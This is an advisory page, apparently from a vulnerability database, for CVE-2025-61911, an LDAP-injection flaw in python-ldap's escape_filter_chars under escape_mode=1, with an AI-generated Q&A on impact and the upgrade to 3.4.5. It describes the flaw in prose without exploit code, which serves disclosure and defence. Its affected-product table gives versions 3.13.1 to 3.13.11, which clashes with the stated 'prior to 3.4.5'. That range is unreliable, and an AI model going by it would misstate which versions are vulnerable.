CVE-2025-61911
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-10-10

Last updated on: 2025-12-04

Assigner: GitHub, Inc.

Description
python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, the sanitization method `ldap.filter.escape_filter_chars` can be tricked to skip escaping of special characters when a crafted `list` or `dict` is supplied as the `assertion_value` parameter, and the non-default `escape_mode=1` is configured. The method `ldap.filter.escape_filter_chars` supports 3 different escaping modes. `escape_mode=0` (default) and `escape_mode=2` happen to raise exceptions when a `list` or `dict` object is supplied as the `assertion_value` parameter. However, `escape_mode=1` computes without performing adequate logic to ensure a fully escaped return value. If an application relies on the vulnerable method in the `python-ldap` library to escape untrusted user input, an attacker might be able to abuse the vulnerability to launch ldap injection attacks which could potentially disclose or manipulate ldap data meant to be inaccessible to them. Version 3.4.5 fixes the issue by adding a type check at the start of the `ldap.filter.escape_filter_chars` method to raise an exception when the supplied `assertion_value` parameter is not of type `str`.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-10-10
Last Modified
2025-12-04
Generated
2026-05-06
AI Q&A
2025-10-11
EPSS Evaluated
2026-05-05
NVD
CVE-2025-61911
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
python-ldap python-ldap From 3.13.1 (inc) to 3.13.11 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-75 The product does not adequately filter user-controlled input for special elements with control implications.
CWE-843 The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in the python-ldap library versions prior to 3.4.5, specifically in the ldap.filter.escape_filter_chars method when used with escape_mode=1. The method fails to properly escape special characters if a crafted list or dictionary is supplied as the assertion_value parameter, allowing an attacker to bypass sanitization. This can lead to LDAP injection attacks because the method does not adequately check the type of the input and does not fully escape the input, potentially allowing manipulation or disclosure of LDAP data.


How can this vulnerability impact me? :

If your application uses the vulnerable python-ldap method to escape untrusted user input, an attacker could exploit this flaw to perform LDAP injection attacks. This could allow the attacker to access, disclose, or manipulate LDAP data that should be inaccessible, potentially compromising the integrity and confidentiality of your directory data.


What immediate steps should I take to mitigate this vulnerability?

Upgrade the python-ldap library to version 3.4.5 or later, which includes a fix that adds a type check to the ldap.filter.escape_filter_chars method to prevent improper escaping when non-string types are supplied. Avoid using escape_mode=1 with untrusted input until the upgrade is applied.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart